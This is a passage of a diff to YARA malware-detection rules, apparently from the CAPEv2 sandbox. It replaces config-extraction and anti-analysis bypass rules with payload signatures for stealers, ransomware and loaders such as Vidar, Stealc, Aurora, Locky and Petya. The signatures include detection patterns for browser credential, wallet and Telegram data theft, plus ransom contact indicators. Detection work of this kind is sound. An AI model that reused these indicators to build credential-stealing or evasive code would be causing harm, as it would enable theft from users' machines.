+		logic_hash = "0d8fa7ab4c8e5699f17f9e9444e85a42563a840a8e7ee9eda54add3a6845d1c6"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "clear,sysbp=$indirect+40,sysbpmode=1,force-sleepskip=1"
-		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
+		cape_type = "Scarab Payload"
 
 	strings:
-		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1 [4] FF 15}
-		$sysenter1 = {89 44 24 08 8D 85 20 FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
-		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
+		$crypt1 = {8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08}
+		$crypt2 = {8B 4C 82 0C 8B D9 C1 E3 18 C1 E9 08 0B D9 8B CB 0F B6 D9 8B 1C 9D AC 0C 43 00 89 5C 24 04 8B D9 C1 EB 08 0F B6 DB 8B 34 9D AC 0C 43 00 8B D9 C1 EB 10}
+		$crypt3 = {8B 13 8B CA 81 E1 80 80 80 80 8B C1 C1 E8 07 50 8B C1 59 2B C1 25 1B 1B 1B 1B 8B CA 81 E1 7F 7F 7F 7F 03 C9 33 C1 8B C8 81 E1 80 80 80 80 8B F1 C1 EE 07}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Pikexport : FILE
+rule CAPE_Vidar : FILE
 {
 	meta:
-		description = "Pikabot export selection"
-		author = "kevoreilly"
-		id = "7d2432f2-90ae-5ad0-b579-5789a1c14a08"
-		date = "2024-03-12"
-		modified = "2024-03-12"
+		description = "Vidar Payload"
+		author = "kevoreilly,rony"
+		id = "9e4e797f-880e-54eb-ad44-caad0ec5683c"
+		date = "2023-04-21"
+		modified = "2023-04-21"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Pikabot.yar#L16-L28"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646"
-		logic_hash = "33f58703a0e40c2361343dbdcc17111aafbf5cc912393edda79005c6ec566f42"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Vidar.yar#L1-L22"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5d4c030536ed41cf4e0dcb77b2fe4553d789ee2b8095a4b3e050692335a8709d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_type = "Vidar Payload"
+		packed = "0cff8404e73906f3a4932e145bf57fae7a0e66a7d7952416161a5d9bb9752fd8"
 
 	strings:
-		$export = {55 8B EC 83 EC ?? C6 45 [2] C6 45 [2] C6 45 [2] C6 45 [2] C6 45}
-		$pe = {B8 08 00 00 00 6B C8 00 8B 55 ?? 8B 45 ?? 03 44 0A 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 E8 C7 45 F8 00 00 00 00}
+		$decode = {FF 75 0C 8D 34 1F FF 15 ?? ?? ?? ?? 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8}
+		$xor_dec = {0F B6 [0-5] C1 E? ?? 33 ?? 81 E? [0-5] 89 ?? 7C AF 06}
+		$wallet = "*wallet*.dat" fullword ascii wide
+		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii wide
+		$s2 = "screenshot.jpg" fullword ascii wide
+		$s3 = "\\Local State" fullword ascii wide
+		$s4 = "Content-Disposition: form-data; name=\"" fullword ascii wide
+		$s5 = "CC\\%s_%s.txt" fullword ascii wide
+		$s6 = "History\\%s_%s.txt" fullword ascii wide
+		$s7 = "Autofill\\%s_%s.txt" fullword ascii wide
+		$s8 = "Downloads\\%s_%s.txt" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16be( 0 ) == 0x4d5a and 6 of them
 }
-rule CAPE_Lumma : FILE
+rule CAPE_Jaff : FILE
 {
 	meta:
-		description = "Lumma config extraction"
+		description = "Jaff Payload"
 		author = "kevoreilly"
-		id = "b2166620-3070-5727-b189-e6959cc5b698"
-		date = "2024-05-09"
-		modified = "2024-05-09"
+		id = "6681c1fe-6c88-5a49-bdfa-54ce08ea6707"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Lumma.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "a8f9212b619796f91f14c4164e4d2f30c66b51118f22f3d6c310841b6707b7b0"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Jaff.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6806a5eeee04b7436ff694addc334bfc0f1ee611116904d57be9506acfd47418"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$decode+5,action0=string:ebp,count=0,bp1=$patch+8,action1=skip,typestring=Lumma Config"
-		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
+		cape_type = "Jaff Payload"
 
 	strings:
-		$c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF}
-		$decode = {C6 44 05 00 00 83 C4 2C 5E 5F 5B 5D C3}
-		$patch = {66 C7 0? 00 00 8B 46 1? C6 00 01 8B}
+		$a1 = "CryptGenKey"
+		$a2 = "353260540318613681395633061841341670181307185694827316660016508"
+		$b1 = "jaff"
+		$b2 = "2~1c0q4t7"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 1 of ( $b* ) )
 }
-rule CAPE_Lummaremap
+rule CAPE_Doomedloader : FILE
 {
 	meta:
-		description = "Lumma ntdll-remap bypass"
+		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "93ae37d1-a38a-5f96-8bb3-cc648a49b588"
+		id = "88436e71-360e-5719-989f-24e71591ebe0"
 		date = "2024-05-09"
 		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Lumma.yar#L16-L27"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "51093379fbd041f75bdfe161bc9dfcc7d782c23ce16d625ca558bb58d8d57713"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/DoomedLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "54a5962ef49ebf987908c4ea1559788f7c96a7e4ea61d2973636e998a0239c77"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "ntdll-remap=0"
-		packed = "7972cbf2c143cea3f90f4d8a9ed3d39ac13980adfdcf8ff766b574e2bbcef1b4"
+		tags = "FILE"
+		cape_type = "DoomedLoader Payload"
+		packed = "914b1b3180e7ec1980d0bafe6fa36daade752bb26aec572399d2f59436eaa635"
 
 	strings:
-		$remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11}
+		$anti = {48 8B 4C 24 ?? E8 [4] 84 C0 B8 [4] 41 0F 45 C6 EB}
+		$syscall = {49 89 CA 8B 44 24 08 FF 64 24 10}
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Guloaderprecursor : FILE
+rule CAPE_Ramnit : FILE
 {
 	meta:
-		description = "Guloader precursor"
+		description = "Ramnit Payload"
 		author = "kevoreilly"
-		id = "663f89d7-a18b-5b03-a7cb-52444a887fa4"
-		date = "2023-10-02"
-		modified = "2023-10-02"
+		id = "6df92055-05f6-5985-9268-b9c85e143567"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Guloader.yar#L17-L28"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "ea05c352739366a03da302074b01537382ba26f7fd5049004f156e47d284f070"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Ramnit.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6f661f47bdf8377b0fb96f190fcb964c0ed2b43ce7ae7880f9dfce9e43837efd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$antidbg,action0=scan,hc0=1,count=0"
+		cape_type = "Ramnit Payload"
 
 	strings:
-		$antidbg = {39 48 04 (0F 85 [3] ??|75 ??) 39 48 08 (0F 85 [3] ??|75 ??) 39 48 0C (0F 85 [3] ??|75 ??)}
-		$except = {8B 45 08 [0-3] 8B 00 [0-3] 8B 58 18 [0-20] 81 38 05 00 00 C0 0F 85 [4-7] 83 FB 00 (0F 84|74)}
+		$DGA = {33 D2 B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 F7 E2 8B D1 8B C8 B8 14 0B 00 00 F7 E2 2B C8 33 D2 8B C1 8B}
+		$xor_loop = {83 7D 0C 00 74 27 83 7D 14 00 74 21 8B 4D 0C 8B 7D 08 8B 75 10 BA 00 00 00 00 0B D2 75 04 8B 55 14 4A 8A 1C 32 32 1F 88 1F 47 4A E2 ED}
+		$id_string = "{%08X-%04X-%04X-%04X-%08X%04X}"
 
 	condition:
-		2 of them and not uint16( 0 ) == 0x5A4D
+		uint16( 0 ) == 0x5A4D and all of ( $* )
 }
-rule CAPE_Singlestepantihook
+rule CAPE_Locky : FILE
 {
 	meta:
-		description = "Single-step anti-hook Bypass"
+		description = "Locky Payload"
 		author = "kevoreilly"
-		id = "f7aca40b-d231-543b-81f3-5f4524abab78"
-		date = "2021-08-26"
-		modified = "2021-08-26"
+		id = "664d0365-af49-5222-a4ed-9260332f6940"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/SingleStepAntiHook.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "fc9f36b0ecc13192fe8b6caaff256ac52c1f14480223d629a38ba84e90dd0809"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Locky.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "9786c54a2644d9581fefe64be11b26e22806398e54e961fa4f19d26eae039cd7"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$antihook+6,action0=skip,count=0"
+		tags = "FILE"
+		cape_type = "Locky Payload"
 
 	strings:
-		$antihook = {FF D? 83 EC 08 9C 81 0C 24 00 01 00 00 9D}
+		$string1 = "wallet.dat" wide
+		$string2 = "Locky_recover" wide
+		$string3 = "opt321" wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Socks5Systemz : FILE
+rule CAPE_Carbanak : FILE
 {
 	meta:
-		description = "Socks5Systemz config extraction"
-		author = "kevoreilly"
-		id = "ef14953a-2b48-54f4-8d15-c07c7459103e"
-		date = "2025-05-23"
-		modified = "2025-05-23"
+		description = "Carnbanak Payload"
+		author = "enzok"
+		id = "e6d395d5-65ba-5efb-bcbc-c6d56a96f0c1"
+		date = "2024-03-18"
+		modified = "2024-03-18"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Socks5Systemz.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "7e324bacd1ea57585435b6a5a4c93bda63ca146c100f2361a1c5530b87668299"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Carbanak.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "c9c1b06cb9c9bd6fc4451f5e2847a1f9524bb2870d7bb6f0ee09b9dd4e3e4c84"
+		logic_hash = "8ed5ab07f1635dc7cdf296e86a71a0a99d0b2faef8fc460f43d426b24b8c8367"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "br0=user32::wsprintfA,br1=ntdll::sprintf,action2=string:[esp],action3=string:[esp],count=0,typestring=Socks5Systemz Config"
-		packed = "9b997d0de3fe83091726919a0dc653e22f8f8b20b1bb7d0b8485652e88396f29"
+		cape_type = "Carbanak Payload"
 
 	strings:
-		$chunk1 = {0F B6 84 8A [4] E9 [3] (00|FF)}
-		$chunk2 = {0F B6 04 8D [4] E9 [3] (00|FF)}
-		$chunk3 = {66 0F 6F 05 [4] E9 [3] (00|FF)}
-		$chunk4 = {F0 0F B1 95 [4] E9 [3] (00|FF)}
-		$chunk5 = {83 FA 04 E9 [3] (00|FF)}
-		$chunk6 = {8A 04 8D [4] E9 [3] (00|FF)}
-		$chunk7 = {83 C4 04 83 C4 04 E9}
-		$chunk8 = {83 C2 04 87 14 24 5C E9}
+		$sboxinit = {0F BE 02 4? 8D 05 [-] 4? 8D 4D ?? E8 [3] 00 33 F6 4? 8D 5D ?? 4? 63 F8 8B 45 ?? B? B1 E3 14 06}
+		$decode_string = {0F BE 03 FF C9 83 F8 20 7D ?? B? 1F [3] 4? 8D 4A E2 EB ?? 3D 80 [3] 7D ?? B? 7F [3] 4? 8D 4A A1 EB ?? B? FF [3] 4? 8D 4A 81}
+		$constants = {0F B7 05 [3] 00 0F B7 1D [3] 00 83 25 [3] 00 00 89 05 [3] 00 0F B7 05 [3] 00 89 1D [3] 00 89 05 [3] 00 33 C0 4? 8D 4D}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Latrodectus : FILE
+rule CAPE_Stealc : FILE
 {
 	meta:
-		description = "Latrodectus export selection"
+		description = "Stealc Payload"
 		author = "kevoreilly"
-		id = "7c6f167a-6b76-5509-b164-306d1cd19b0f"
-		date = "2024-02-26"
-		modified = "2024-02-26"
+		id = "77567584-7c84-5351-938b-d29d612a042d"
+		date = "2024-09-10"
+		modified = "2024-09-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Latrodectus.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05"
-		logic_hash = "c2c9f23e287253d766425c05eb774f6e07bdcbabc259e04b723a1a87c8b91fbd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Stealc.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
+		logic_hash = "a6165168b7c74761b91d1691465688c748227b830813067edb4e9bdc934271c4"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_type = "Stealc Payload"
 
 	strings:
-		$export = {48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 EC 30 4C 8B 05 [4] 33 D2 C7 40 [5] 88 50 ?? 49 63 40 3C 42 8B 8C 00 88 00 00 00 85 C9 0F 84}
+		$nugget1 = {68 04 01 00 00 6A 00 FF 15 [4] 50 FF 15}
+		$nugget2 = {64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Ursnifv3
+rule CAPE_Dridexloader : FILE
 {
 	meta:
-		description = "Ursnif Config Extraction"
+		description = "Dridex v4 dropper C2 parsing function"
 		author = "kevoreilly"
-		id = "4170b638-e51b-59c6-956a-50ff82f629ba"
-		date = "2023-03-23"
-		modified = "2023-03-23"
+		id = "43bd9631-4611-567c-bee5-d926e060b977"
+		date = "2021-03-10"
+		modified = "2021-03-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/UrsnifV3.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "d679546e37ee58087fce75920b2ce4e6d2b9ae55fb1ef80d14ec14309396757c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/DridexLoader.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "20696b1f14539c8ecf21bffc696596040c20b1ee2fcedc173945482c0baca588"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "br0=$crypto32_1-48,action1=dump:ebx::eax,bp2=$crypto32_3+50,action2=dump:ebx::eax,bp3=$crypto32_4+11,action3=dump:eax::ecx,typestring=UrsnifV3 Config,count=1"
-		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
-		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
+		tags = "FILE"
+		cape_type = "DridexLoader Payload"
 
 	strings:
-		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
-		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [4] 8B D8 89 5C 24 1C 85 DB 74 41 F6 46 03 01 74 53 8B 46 10 89 44 24 1C 8B 46 0C 53 03 C7 E8 [4] 59}
-		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4E 10 C6 04 08 00 8B 4D ?? 89 01 8B 46 ?? 8B 4D ?? 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
-		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
+		$c2parse_1 = {57 0F 95 C0 89 35 [4] 88 46 04 33 FF 80 3D [4] 00 76 54 8B 04 FD [4] 8D 4D EC 83 65 F4 00 89 45 EC 66 8B 04 FD [4] 66 89 45 F0 8D 45 F8 50}
+		$c2parse_2 = {89 45 00 0F B7 53 04 89 10 0F B6 4B 0C 83 F9 0A 7F 03 8A 53 0C 0F B6 53 0C 85 D2 7E B7 8D 74 24 0C C7 44 24 08 00 00 00 00 8D 04 7F 8D 8C 00}
+		$c2parse_3 = {89 08 66 39 1D [4] A1 [4] 0F 95 C1 88 48 04 80 3D [4] 0A 77 05 A0 [4] 80 3D [4] 00 56 8B F3 76 4E 66 8B 04 F5}
+		$c2parse_4 = {0F B7 C0 89 01 A0 [4] 3C 0A 77 ?? A0 [4] A0 [4] 57 33 FF 84 C0 74 ?? 56 BE}
+		$c2parse_5 = {0F B7 05 [4] 89 02 89 15 [4] 0F B6 15 [4] 83 FA 0A 7F 07 0F B6 05 [4] 0F B6 05 [4] 85 C0}
+		$c2parse_6 = {0F B7 53 ?? 89 10 0F B6 4B ?? 83 F9 0A 7F 03 8A 53 ?? 0F B6 53 ?? 85 D2 7E B9}
 
 	condition:
-		any of ( $crypto32* ) and $cpuid
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Agentteslav4Jit
+rule CAPE_Aurorastealer : FILE
 {
 	meta:
-		description = "AgentTesla V4 JIT native config extractor"
-		author = "kevoreilly"
-		id = "a87dca44-4974-543c-9565-487ed99be2a6"
-		date = "2024-02-27"
-		modified = "2024-02-27"
+		description = "detects Aurora Stealer samples"
+		author = "Johannes Bader @viql"
+		id = "07779318-3e5d-5e67-8c04-f3f70d7e48b7"
+		date = "2022-12-14"
+		modified = "2023-03-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/AgentTesla.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "8f7144d2a989ce8d291af926b292f5f0f7772e707b0e49797eba13ecf91b90bc"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AuroraStealer.yar#L1-L74"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "0d10e9268184f494a73d5b4ab0d9a478ad0c26d2ef13d5134f8c9769f028b8f5"
 		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "bp0=$decode1+8,count=0,action0=string:ecx,typestring=AgentTesla Strings,no-logs=2"
-		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
+		quality = 45
+		tags = "FILE"
+		version = "v1.0"
+		tlp = "TLP:WHITE"
+		malpedia_family = "win.aurora_stealer"
+		hash1_md5 = "51c153501e991f6ce4901e6d9578d0c8"
+		hash1_sha1 = "3816f17052b28603855bde3e57db77a8455bdea4"
+		hash1_sha256 = "c148c449e1f6c4c53a7278090453d935d1ab71c3e8b69511f98993b6057f612d"
+		hash2_md5 = "65692e1d5b98225dbfb1b6b2b8935689"
+		hash2_sha1 = "0b51765c175954c9e47c39309e020bcb0f90b783"
+		hash2_sha256 = "5a42aa4fc8180c7489ce54d7a43f19d49136bd15ed7decf81f6e9e638bdaee2b"
+		cape_type = "AuroraStealer Payload"
 
 	strings:
-		$decode1 = {8B 01 8B 40 3C FF 50 10 8B C8 E8 [4] 89 45 CC B8 1A 00 00 00}
-		$decode2 = {83 F8 18 75 2? 8B [2-5] D1 F8}
-		$decode3 = {8D 4C 0? 08 0F B6 01 [0-3] 0F B6 5? 04 33 C2 88 01 B8 19 00 00 00}
+		$str_func_01 = "main.(*DATA_BLOB).ToByteArray"
+		$str_func_02 = "main.Base64Encode"
+		$str_func_03 = "main.Capture"
+		$str_func_04 = "main.CaptureRect"
+		$str_func_05 = "main.ConnectToServer"
+		$str_func_06 = "main.CreateImage"
+		$str_func_07 = "main.FileExsist"
+		$str_func_08 = "main.GetDisplayBounds"
+		$str_func_09 = "main.GetInfoUser"
+		$str_func_10 = "main.GetOS"
+		$str_func_11 = "main.Grab"
+		$str_func_12 = "main.MachineID"
+		$str_func_13 = "main.NewBlob"
+		$str_func_14 = "main.NumActiveDisplays"
+		$str_func_15 = "main.PathTrans"
+		$str_func_16 = "main.SendToServer_NEW"
+		$str_func_17 = "main.SetUsermame"
+		$str_func_18 = "main.Zip"
+		$str_func_19 = "main.base64Decode"
+		$str_func_20 = "main.countupMonitorCallback"
+		$str_func_21 = "main.enumDisplayMonitors"
+		$str_func_22 = "main.getCPU"
+		$str_func_23 = "main.getDesktopWindow"
+		$str_func_24 = "main.getGPU"
+		$str_func_25 = "main.getMasterKey"
+		$str_func_26 = "main.getMonitorBoundsCallback"
+		$str_func_27 = "main.getMonitorRealSize"
+		$str_func_28 = "main.sysTotalMemory"
+		$str_func_29 = "main.xDecrypt"
+		$str_type_01 = "type..eq.main.Browser_G"
+		$str_type_02 = "type..eq.main.STRUSER"
+		$str_type_03 = "type..eq.main.Telegram_G"
+		$str_type_04 = "type..eq.main.Crypto_G"
+		$str_type_05 = "type..eq.main.ScreenShot_G"
+		$str_type_06 = "type..eq.main.FileGrabber_G"
+		$str_type_07 = "type..eq.main.FTP_G"
+		$str_type_08 = "type..eq.main.Steam_G"
+		$str_type_09 = "type..eq.main.DATA_BLOB"
+		$str_type_10 = "type..eq.main.Grabber"
+		$varia_01 = "\\User Data\\Local State"
+		$varia_02 = "\\\\Opera Stable\\\\Local State"
+		$varia_03 = "Reconnect 1"
+		$varia_04 = "@ftmone"
+		$varia_05 = "^user^"
+		$varia_06 = "wmic path win32_VideoController get name"
+		$varia_07 = "\\AppData\\Roaming\\Telegram Desktop\\tdata"
+		$varia_08 = "C:\\Windows.old\\Users\\"
+		$varia_09 = "ScreenShot"
+		$varia_10 = "Crypto"
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5A4D and ( 32 of ( $str_* ) or 9 of ( $varia_* ) )
 }
-rule CAPE_Agentteslav3Jit
+rule CAPE_Petya : FILE
 {
 	meta:
-		description = "AgentTesla V3 JIT native string decryption"
-		author = "ClaudioWayne"
-		id = "590c5058-c1db-5366-8db5-57449a178999"
-		date = "2024-02-27"
-		modified = "2024-02-27"
+		description = "Petya Payload"
+		author = "kevoreilly"
+		id = "e581747c-c40f-5689-84b4-d55134b532f7"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/AgentTesla.yar#L16-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "62a49cf4295df637f96ba7c127cfc4aeb9af2fcced497fdf34d726a062edc1ec"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Petya.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "f819261bb34f3b2eb7dc2f843b56be25105570fe902a77940a632a54fbe0d014"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$decode+20,count=0,action0=string:eax+8,typestring=AgentTesla Strings,no-logs=2"
+		tags = "FILE"
+		cape_type = "Petya Payload"
 
 	strings:
-		$decode = {8B C8 57 FF 75 08 8B [5] 8B 01 8B 40 3C FF [2] 8B F0 B8 03 00 00 00}
+		$a1 = "CHKDSK is repairing sector"
+		$a2 = "wowsmith123456@posteo.net"
+		$a3 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Rdtscpantivm
+rule CAPE_Eternalromance : FILE
 {
 	meta:
-		description = "RdtscpAntiVM bypass"
+		description = "EternalRomance Exploit"
 		author = "kevoreilly"
-		id = "11dc634b-1e2f-55b4-be60-98e51de42d43"
-		date = "2021-12-11"
-		modified = "2021-12-11"
+		id = "34035076-9dda-5e32-bd0b-d0257a96329b"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/RdtscpAntiVM.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
